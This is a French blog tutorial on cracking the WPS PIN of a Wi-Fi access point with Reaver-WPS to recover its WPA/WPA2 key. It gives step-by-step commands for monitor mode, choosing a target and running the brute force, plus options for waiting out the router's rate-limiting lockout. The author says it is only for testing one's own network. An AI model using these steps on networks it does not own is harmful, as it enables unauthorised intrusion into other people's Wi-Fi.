vendredi 15 février 2013

Reaver-wps Cracker un point d'accès wifi WPA/WPA2

Reaver-wps
Cracker un point d'accès wifi WPA/WPA2



Pour : Linux, Mac et Windows


Ce tutoriel a pour ojectif de vous montrer le fonctionnement de Reaver-wps qui utilise une faille de sécurité sur certain point d'accès wifi.
Cette outil vous permet de tester la sécurité de votre réseau wifi et ne doit en aucun cas être utilisé pour pirater des points accès ne nous appartenant pas, celà est stritement interdit.

Cette attaque est de type brute force et ne marche uniquement que si le point d'accès wifi a le dispositif de sécurité WPS d'activé.



Télécharger et installer les logiciels nécessaire

Télécharger la dernière version de Libpcap sur le site www.tcpdump.org
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.2.1:

 wget www.tcpdump.org/release/libpcap-1.2.1.tar.gz


Télécharger la dernière version de la suite Aircrack sur www.aircrack-ng.org
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.1:
 wget download.aircrack-ng.org/aircrack-ng-1.1.tar.gz


Télécharger la dernière version de Reaver-wps sur reaver-wps.googlecode.com
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.4:
 wget reaver-wps.googlecode.com/files/reaver-1.4.tar.gz


Voir ce tutoriel pour décompresser et installer les logiciels:
Make - Compiler, configurer et installer un logiciel avec les sources



Fonctionnement

On va lancer l'outil airmon-ng en mode surveillance (monitor).
On commence par afficher les cartes wifi disponible, saisissez dans un terminal:
 # airmon-ng




Pour lancer la surveillance sur votre interface wifi:
 # airmon-ng start wlan0




Après on lance airodump pour afficher les réseaux disponibles:
 # airodump-ng mon0




Après avoir trouvé le point d'accès à attaquer, on lance reaver-wps avec les arguments suivants:
 reaver -i mon0 -b [BSSID de l'AP] -vv


Quelques options supplémentaires a reaver-wps:
-e [ESSID du point d'accès]
-c [Canal du point d'accès]
-t [Delai d'attente de la réception avant de renvoyer] Default 5 secondes
-d [Delai entre chaque tentatives de connexion] Default 1 seondes
-l [Delai d'attente en secondes lors d'une détection WPS]
-f Pour obliger reaver-wps a ne pas changer ne canal
-vv Mode bavard (verbose)
-x [Temps en secondes]
-r [NB Tentative]:[Temps d'arrêt] Permet de faire une pause toutes les X tentatives.

Normalement, reaver-wps doit automatiquement se configurer pour s'associer au point d'accès et ainsi commencer l'attaque brute force du PIN.



Une fois le code PIN trouvé, reaver-wps vous affichera la clé de connexion WPA/WPA2 PSK



Sauvegarde

Les données lors de l'attaque d'un point d'accès wifi sont enregistré dans le répertoire:
/etc/reaver

Ce qui permet de relancer plus tard le scan du PA au point où vous étiez arrêté.





Les messages d'erreurs de Reaver WPS

 Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying"
Cela signifie que le point d'accès dispose d'une protection qui a pour but de bloquer toute nouvelle tentative de connexion, assez souvent pendant 5 minutes.
Reaver-wps relancera une nouvelle attaque au bout de 5 minutes et 15 secondes (315 secondes).

Ce delai peut être rallongé si le PA a un temps d'attente plus longue avant de relancer le WPS:
-l [Delai d'attente en secondes lors d'une détection WPS]

Vous pouvez spécifier un delai d'attente lorsque 10 erreurs WPS consecutives ont étés rencontrés:
-x [Temps en secondes]

Ou encore avec l'option "-r", essayez de faire par exemple une pause de 60 secondes toutes les 3 tentatives:
-r 3:60
Cela affichera ce message d'information a chaque fois:
Entering recurring delay of 60 seconds


 Message "WARNING: Receive timeout occured"
Signifie que reaver-wps a une perte de réception avec le point accès.
Vérifiez que la force du signal.



Base de donnée de Reaver WPS

L'auteur met à disposition une base de donnée sur les points d'accès wifi (modem/routeur/box) qui on été testé avec Reaver WPS.
Cette base de donnée est réalisé dans le tableur de Google Document, disponible à cette adresse:
https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0



Lien pour aller sur le site de l'éditeur:
code.google.com/p/reaver-wps


Par O.Cédric
Sur www.octetmalin.net

Article publié le:
09/01/2012 10:00

Mise à jour le:
10/02/2012 09:39